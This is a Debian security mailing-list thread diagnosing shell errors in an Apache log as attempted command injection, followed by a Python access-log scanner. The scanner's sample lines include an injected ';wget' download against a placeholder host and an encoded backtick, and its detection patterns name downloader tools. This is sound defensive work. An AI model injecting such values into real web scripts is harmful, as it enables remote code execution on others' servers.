What does your application do? It looks like it is finding a shell script somewhere? We've seen similar things when executing CGIs and not filtering the input data so well. Lines 22 and 24 make me think there is a script somewhere rather than arbitrary GET data.

> -----Original Message-----
> From: Brian Brazil [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, January 31, 2006 4:53 PM
> To: debian-security@lists.debian.org
> Subject: Re: Weird message in my apache error log
>
> On Tue, Jan 31, 2006 at 11:19:45PM +0100, Josep Serrano wrote:
> > Hello all. I got some weird entries in my apache error log.
> > Any clues about what/where/how ?
> >
> > sh: -c: line 22: unexpected EOF while looking for matching ``'
> > sh: -c: line 24: syntax error: unexpected end of file
> >
> > sh: -c: line 0: unexpected EOF while looking for matching `"'
> > sh: -c: line 1: syntax error: unexpected end of file
>
> Looks like someone is trying to do arbitrary command execution. You
> probably have a script somewhere that says `command $_GET['var']`, and
> someone is passing ';attack' as var, but it isn't quite working.
>
> I suggest using the audit log feature of mod_security, or just grepping
> through your access logs for anything odd ('wget' is a good search
> term).
>
> You might have a bot on the system, check for any odd network
> connections, especially to port 6667 (IRC). Also look for www-data owned
> files in /tmp.
>
> Brian
>
> --
> Website: http://www.netsoc.tcd.ie/~bbrazil
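
The access-log search suggested in the quoted message, written out as an added example that is not part of either poster's message: it URL-decodes each query parameter (twice, to catch double encoding) and flags shell metacharacters and downloader names. The log lines, the `/cgi-bin/lookup.php` path, the `host` parameter and the `curl` keyword are assumptions made for the illustration, and the Apache common/combined log format is assumed.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Characters that terminate or nest a command when a script puts a parameter
# into a shell string unquoted: ; | backtick newline and $(
SHELL_META = re.compile(r'[;|`\n]|\$\(')
# 'wget' is the search term suggested in the thread; 'curl' is an added assumption.
FETCHERS = re.compile(r'\b(?:wget|curl)\b', re.IGNORECASE)
CHECKS = (('shell-metacharacter', SHELL_META), ('downloader', FETCHERS))

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so double-encoded input (%253B) is seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return one dict per query parameter that looks like a command-injection probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        client, when, target, status = m.groups()
        for pair in target.partition('?')[2].split('&'):
            name, _, raw = pair.partition('=')
            value = decode(raw)
            reasons = [label for label, rx in CHECKS if rx.search(value)]
            if reasons:
                hits.append({'client': client, 'time': when, 'status': status,
                             'param': name, 'value': value, 'reasons': reasons})
    return hits

# Constructed sample lines (documentation addresses, hypothetical script path).
SAMPLE = [
    '192.0.2.10 - - [31/Jan/2006:22:01:07 +0100] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jan/2006:22:14:52 +0100] "GET /cgi-bin/lookup.php?host=example.invalid%3Bwget%20http%3A%2F%2Fexample.invalid%2Fx HTTP/1.0" 200 312',
    '198.51.100.7 - - [31/Jan/2006:22:15:03 +0100] "GET /cgi-bin/lookup.php?host=%2560x HTTP/1.0" 200 298',
]

if __name__ == '__main__':
    for hit in suspicious_requests(SAMPLE):
        print(hit)
```

The third sample decodes to a lone backtick, the kind of unbalanced quoting that produces the "unexpected EOF while looking for matching" lines in the error log; matching the timestamps of flagged requests against those error-log entries points to the script that is passing input to `sh -c`.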